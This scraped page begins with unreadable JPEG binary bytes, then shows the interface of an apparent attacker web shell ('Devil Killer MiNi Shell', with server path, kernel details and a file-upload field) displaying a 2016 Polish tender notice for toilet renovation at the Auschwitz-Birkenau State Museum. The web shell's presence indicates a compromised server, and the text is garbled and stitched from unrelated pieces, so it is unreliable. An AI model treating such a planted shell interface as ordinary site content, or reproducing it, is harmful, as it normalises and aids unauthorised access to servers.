JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160706/121021-N-2016.html

<p class="kh_header"><b>Oświęcim: Remont i przebudowa toalet w budynkach o numerach inwentaryzacyjnych A-18 i A-22 zlokalizowanych na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu wraz ze zmianą sposobu użytkowania dwóch pomieszczeń w budynku A-18 z pomieszczeń gospodarczych na sanitarne</b><br>
<b>Numer ogłoszenia: 121021 - 2016; data zamieszczenia: 06.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu , ul. Więźniów Oświęcimia 20, 32-603 Oświęcim, woj. małopolskie, tel. 33 844 8003, faks 33 843 18 62.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i przebudowa toalet w budynkach o numerach inwentaryzacyjnych A-18 i A-22 zlokalizowanych na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu wraz ze zmianą sposobu użytkowania dwóch pomieszczeń w budynku A-18 z pomieszczeń gospodarczych na sanitarne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem umowy jest  remont i przebudowa toalet w budynkach o numerach inwentaryzacyjnych A-18  i A-22 zlokalizowanych na terenie Państwowego Muzeum Auschwitz-Birkenau  w Oświęcimiu wraz ze zmianą sposobu użytkowania dwóch pomieszczeń w budynku A-18 z pomieszczeń gospodarczych na sanitarne w następujących zakresach: 
I. Wykonanie robót budowlanych zgonie z dokumentacją projektową i pozwoleniami
1.Projekt budowlany przebudowy i remontu toalet w budynkach A18 i A22  na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 1895 6, 1908 3 A18 i 2695  A 22 architektura, instalacje elektryczne, sanitarne, wentylacja.
2.Projekt wykonawczy przebudowy i remontu toalet w budynkach A18 i A22  na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 1895 6, 1908 3  A18 i 2695 A22- architektura.
3.Projekt wykonawczy przebudowy i remontu toalet w budynkach A18 i A22  na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 1895 6, 1908 3 A18 i 2695 A 22  instalacje elektryczne.
4.Projekt wykonawczy przebudowy i remontu toalet w budynkach A-18 i A-22  na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 1895 6, 1908 3 A18 i 2695 A 22 instalacje sanitarne.
5.Projekt wykonawczy przebudowy i remontu toalet w budynkach A 18 i A 22  na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 1895 6, 1908 3  A 18 i 2695  A22  REWIZJA REV 01  instalacje sanitarne.
6.Projekt wykonawczy przebudowy i remontu toalet w budynkach A18 i A22  na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 1895 6, 1908 3 A18 i 2695 A22 wentylacja.
7.Specyfikacja techniczna wykonania i odbioru robót dla przebudowy i remontu toalet w budynkach A18 i A22  na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 1895 6, 1908 3 A18 i 2695 A22 roboty ogólnobudowlane i wykończeniowe.
8.Specyfikacja techniczna wykonania i odbioru robót dla przebudowy i remontu toalet w budynkach A18 i A22  na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 1895 6, 1908 3 A18 i 2695 A22
 instalacje elektryczna.
9.Specyfikacja techniczna wykonania i odbioru robót dla przebudowy i remontu toalet w budynkach A18 i A22  na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 1895 6, 1908 3 A18 i 2695 A22 instalacje sanitarne.
10.Specyfikacja techniczna wykonania i odbioru robót dla przebudowy i remontu toalet w budynkach A18 i A22  na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 18956, 19083 A18 i 2695 A22 wentylacja.
11.Przykładowy projekt pn Automatyzacja węzła cieplnego C.O budynek A-27 wzór załącznik nr 12 do siwz dokumentacja techniczna
12.Zakres prac dotyczący stolarki okiennej, parapetów z lastriko i drewnianych framug wykonać zgodnie z wytycznymi konserwatorskimi opisanymi w załączniku nr 3 do siwz.  
13. Nie przewiduje się  wykonania następujących robót budowlanych: w bloku A22 skucia płyty betonowej na gruncie ( zakres opisany w projekcie budowlanym).W istniejącej płycie betonowej należy wykonać cięcie piłą do betonu pasem szerokości max.40cm wzdłuż ustalonego przebiegu kanalizacji. Zakres prac pod wykonać pod nadzorem Zamawiającego oraz autora projektu. 
14.	Decyzja o pozwoleniu na budowę dla przebudowy i remontu toalet w budynkach A18 i A22 wraz ze zmianą sposobu użytkowania dwóch pomieszczeń bloku A18 z pomieszczeń gospodarczych na sanitarne na terenie Byłego Niemieckiego Nazistowskiego Obozu Koncentracyjnego i Zagłady Auschwitz-Birkenau  w Oświęcimiu na działkach nr 1895 6, 1908 3, 2695 A18 i 2695 A22 decyzja nr372 16 z dnia 24.06.2016r. o symbolu WAB.6740.1.248.2016r. 
15.Pozwolenie Małopolskiego Wojewódzkiego Konserwatora Zabytków na prowadzenie robót budowlanych przy blokach nr A18 i A22 na terenie byłego niemieckiego nazistowskiego obozu koncentracyjnego i zagłady Auschwitz I , pozwolenie nr 375 16 z dnia 12.04.2016r., znak: OZKr.5142.287.2016.JCh. i znak: OZKr.5142.401.2016.JCh.
16.Pozwolenie Małopolskiego Wojewódzkiego Konserwatora Zabytków na prowadzenie badań archeologicznych przy blokach nr A-18 na terenie byłego niemieckiego nazistowskiego obozu koncentracyjnego i zagłady Auschwitz I , pozwolenie nr 60 16 z dnia 22.02.2016r., znak: OZKr.5161.41.2016.ED.
17.Obowiązującymi przepisami prawa, w szczególności ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity z dnia 12 listopada 2010 Dz.U. z 2010 nr 243 poz. 1623.) wraz z przepisami wykonawczymi, przepisami BHP, przepisami przeciwpożarowymi, w tym z Instrukcją Bezpieczeństwa Pożarowego stanowiącej załącznik nr 6 do umowy,
18.ustaleniami nadzorów autorskich,
19.specyfikacją istotnych warunków zamówienia, (zwaną dalej SIWZ) oraz Ofertą Wykonawcy złożoną w postępowaniu, 

II. Wykonanie robót budowlanych  nie ujętych w dokumentacji projektowej:
1. Modernizacja istniejącej szafki AKP w oparciu o wzór dokumentacji o której mowa                w pkt. I.11  polegającą na :
- wymianie szafki AKP na metalową , kolor szary , malowana proszkowo,
- pozostawieniu rezerwy w szafce o. 20%,
-zabudowie nowego sterownika dla sterownia obwodem C.O wystawy węgierskiej i toalet. Sterownik musi mieć możliwość wpięcia do istn. koncentratora sieciowego                     MS-NAE-32. Połączenie sterownik -koncentrator zrealizować za pomocą istniejącej magistrali,
- odtworzeniu sterowania dla węzła wystawy węgierskiej tak jak aktualnie w sterowniku DX-9100
-zaprogramować sterownik dla węzła
Dla zakresu wskazanego powyżej należy wykonać dokumentację powykonawczą                                   i fotograficzną.

III. Wykonanie dokumentacji powykonawczej i fotograficznej z przeniesieniem autorskich praw majątkowych. 
1.Dokumentację powykonawczą wykonać zgodnie z art. 3 pkt. 14 ustawy Prawo Budowlane oraz wytycznymi stanowiącymi załącznik nr 1do siwz. Opracowana dokumentacja powykonawcza musi odzwierciedlać i dokumentować stan faktyczny wykonanych robót. Dokumentację należy sporządzić na kopii zatwierdzonego projektu budowlanego. Wymaga się aby dokumentacja została wydrukowana i zszyta w twardej oprawie, tak aby pojedyncze kartki były ze sobą klejone w tzw. składki, które następnie zostaną ze sobą zszyte. Należy przekazać Zamawiającemu - 3 egzemplarze drukowane + wersja elektroniczna w formacie doc, dwg, pdf dołączona na płycie CD do każdego egzemplarza oraz dodatkowo na innym nośniku cyfrowym ( dysk zewnętrzny). 
2.Dokumentacja fotograficzna musi zawierać fotografie miejsc ingerencji w obiekt zabytkowy przed, w trakcie i po wykonaniu prac. Dotyczy to np.: przebić przez ściany, stropy, wykonanie bruzd itp. Nie dotyczy natomiast np. wykonywania ślepych otworów pod kołki rozporowe, pojedyncze przewierty o średnicach o < 22 mm Fotografie należy przekazać zarówno  w formie cyfrowej jak i wydruku . Zdjęcia w formie cyfrowej ( pliki źródłowe ze zdjęciami w formacie TIFF lub RAW oraz JPG) muszą być wykonane w jakości umożliwiającej wydruk w formacie min. 15cmx20cm w rozdzielczości min. 300 dpi, rozdzielczość matrycy 12 mln pikseli. Wymaga się, aby fotografie były ostre, wykonane przy dużej głębi ostrości, kadrowane w taki sposób aby zachować pion i poziom oraz zasady kompozycji. Pliki źródłowe ze zdjęciami w formacie TIFF, RAW,JPG należy przekazać Zamawiającemu na dysku zewnętrznym. W formie papierowej zdjęcia wraz z ich opisami powinny zostać wydrukowane łącznie na papierze fotograficznym. Wymaga się aby dokumentacja została wydrukowana i zszyta  w twardej oprawie, tak aby pojedyncze kartki były ze sobą klejone w tzw. składki, które następnie zostaną ze sobą zszyte. Należy przekazać Zamawiającemu  dokumentację fotograficzną w wersji papierowej (3 egzemplarze drukowane ) oraz elektronicznej (w formacie edytowalnym tj. dwg, .doc oraz nieedytowalnym np. pdf, jpg).

Przedmiot umowy zostanie wykonany w dwóch etapach 
ETAP I - remont i przebudowa toalet w budynku nr  A-22 odpowiednio w zakresie I i III ETAP II- remont i przebudowa toalet w budynku nr  A-18 odpowiednio w zakresie I, II  i III.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na  powtórzeniu tego samego rodzaju zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.22.00.00-5, 45.40.00.00-1, 45.21.23.14-0, 45.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.1. Każda oferta musi być zabezpieczona wadium w wysokości: 20 000,00 zł (słownie: dwadzieścia  tysięcy złotych 00/100).
10.2. Wadium wnosi się przed upływem terminu składania ofert.
10.3. Za termin wniesienia wadium w pieniądzu uznaje się datę wpływu środków na rachunek Zamawiającego PAŃSTWOWE MUZEUM AUSCHWITZ-BIRKENAU w Oświęcimiu.
10.4. Termin wniesienia wadium upływa 04.08.2016 r. o godz.12:00. Wadium w pieniądzu zostanie skutecznie wniesione, jeżeli przed upływem terminu składania ofert kwota wadium znajdzie się na rachunku bankowym Zamawiającego PAŃSTWOWE MUZEUM AUSCHWITZ-BIRKENAU w Oświęcimiu.
10.5. Wadium musi obejmować okres związania ofertą.
10.6.Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	 pieniądzu,
b)	 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	w gwarancjach bankowych,
d)	w gwarancjach ubezpieczeniowych,
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dn. 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
10.7. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek Zamawiającego
PAŃSTWOWE MUZEUM AUSCHWITZ-BIRKENAU w Oświęcimiu: Bank Gospodarstwa Krajowego, Oddział Kraków, ul. Pilotów 2, 31-462 Kraków, nr rachunku 80 1130 1150 0012 1268 9790 0005 z dopiskiem: wadium -znak postępowania
10.8. Wadium wnoszone w formie lub w formach innych niż w pieniądzu, powinno być złożone w oryginale oraz powinno zawierać przesłanki  utraty wadium na rzecz Zamawiającego PAŃSTWOWE MUZEUM AUSCHWITZ-BIRKENAU w Oświęcimiu wskazane w art. 46 ust 4a) i ust. 5 ustawy. Ponadto, w przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być co najmniej gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze żądanie oraz powinna być sporządzona zgodnie z obowiązującym prawem. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. Za wypłatę należności w sposób bezwarunkowy  nie można uznać gwarancji/poręczenia  z postanowieniem uzależniającym wypłatę Zamawiającemu wadium od uprzedniego wezwania Wykonawcy do zapłaty.
10.9. Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy.
10.10. Zamawiający zatrzymuje wadium w wyniku okoliczności, o których mowa w art. 46 ust. 4a i 5ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca (Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego) wykaże(-ą), że posiada/ją doświadczenie polegające na należytym wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
a)	minimum dwóch robót budowlanych z których każda musi obejmować jednocześnie roboty ogólnobudowlane, instalacyjne i wykończeniowe) w budynku wpisanym do rejestru zabytków, o którym mowa w ustawie z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2003 roku nr 162 poz. 1568 z późn.zm.) lub rejestru zabytków prowadzonego przez organy ustanowione w tym celu w państwach obcych, w tym jedna o wartości robót budowlanych nie mniej niż 700 000,00 zł netto.
b)	minimum jednej roboty budowlanej obejmującej łącznie roboty o charakterze ogólnobudowlanym, instalacyjnym i wykończeniowym  w pomieszczeniach  sanitarnych                 o pow. min 60m2.
Przez pomieszczenia sanitarne Zamawiający rozumie kuchnie lub w-c lub łazienkę.
Przez roboty instalacyjne Zamawiający rozumie instalację C.O lub wodną lub kanalizacyjną lub klimatyzacyjną lub wentylacyjną.
Uwaga: Wartości robót budowlanych i wykonanych instalacji określone w walucie innej niż PLN, Wykonawca przeliczy w złotych według kursu średniego NBP (Tabela A) na dzień zakończenia tych robót budowlanych i instalacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca (Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego) wykaże(-ą), że dysponuje/ją lub będzie dysponował:   kierownikiem budowy posiadającym uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi oraz przebytą co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków. Ponadto kierownik budowy musi posiadać minimum 3 letnie licząc od momentu uzyskania uprawnień do kierowania robotami przy zabytkach nieruchomych doświadczenie rozumiane jako suma przepracowanych miesięcy w kierowaniu robotami budowlanymi na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków, o którym mowa w ustawie z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami lub analogicznego do rejestru zabytków sposobu ochrony zabytków prowadzonego przez organy ustanowione w tym celu w państwach obcych, kierownikami robót branżowych tj: osobą posiadającą uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych i wentylacyjnych, gazowych, wodociągowych, kanalizacyjnych, która odbyła co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków, o którym mowa w ustawie z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami lub rejestru zabytków prowadzonego przez organy ustanowione w tym celu w państwach obcych, osobą posiadającą uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci  instalacji i urządzeń elektrycznych i elektroenergetycznych która odbyła co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków, o którym mowa w ustawie z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami lub rejestru zabytków prowadzonego przez organy ustanowione w tym celu w państwach obcych. W/w osoby powinny posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji  technicznych w  budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Stosownie do art. 12 ust. 7 ustawy - Prawo budowlane, podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie stanowi m.in. wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę. Zgodnie z art. 12 a ww. ustawy, samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Jeżeli Wykonawca dysponuje osobą posiadającą uprawnienia wskazane powyżej, która ma miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, musi wykazać, że osoba ta legitymuje się kwalifikacjami odpowiadającymi wymaganym uprawnieniom w kraju zamieszkania, jeśli takie w tym kraju obowiązują z uwzględnieniem prawa do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. Zamawiający dopuszcza zgodnie z zapisami art. 20a Ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów. Zamawiający wskazuje, iż obywatel państwa członkowskiego, posiadający kwalifikacje zawodowe architekta, inżyniera budownictwa lub urbanisty, który prowadzi zgodnie z prawem działalność w zakresie tego zawodu w innym niż Rzeczpospolita Polska państwie członkowskim ma prawo do tymczasowego i okazjonalnego wykonywania zawodu na terytorium Rzeczpospolitej Polskiej, bez konieczności uznawania kwalifikacji zawodowych, z zastrzeżeniem wymogów określonych w ust. 2-11 ww. przepisu. W takiej sytuacji, osoby wskazane w powyższym przepisie, nie są obowiązane do przeprowadzenia procedury uznania kwalifikacji zawodowych w trybie przewidzianym w art. 33a wyżej wskazanej ustawy. W celu potwierdzenia spełnienia uznania wykonywania określonej działalności w charakterze usługi transgranicznej dana osoba musi posiadać m.in. tymczasowy wpis na listę członków właściwej izby samorządu zawodowego, zgodnie z art. 20a ust. 6 powołanej ustawy. W/w osoby wskazane do realizacji nin. zamówienia muszą również bezwzględnie spełniać wymogi, o których mowa w §24 Rozporządzenia Ministra Kultury z dnia 27 lipca 2011 w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych, osobą koordynatora robót branżowych  posiadającą roczne doświadczanie w koordynacji robót wielobranżowych, dyplomowanym konserwatorem zabytków  posiadającym tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku konserwacja i restauracja dzieł sztuki lub konserwacji zabytków w zakresie specjalności dotyczącej konserwacji i restauracji malarstwa lub konserwacji i restauracji elementów i detali architektonicznych lub konserwacji rzeźby który odbył po ukończeniu tych studiów co najmniej 9-miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków, zgodnie z art. 37a Ustawy o ochronie zabytków i opieki nad zabytkami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca zobowiązany jest wskazać w wykazie roboty wystarczające dla potwierdzenia spełniania warunku udziału w postępowaniu, o którym mowa w dziale V, pkt 6.2.2;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

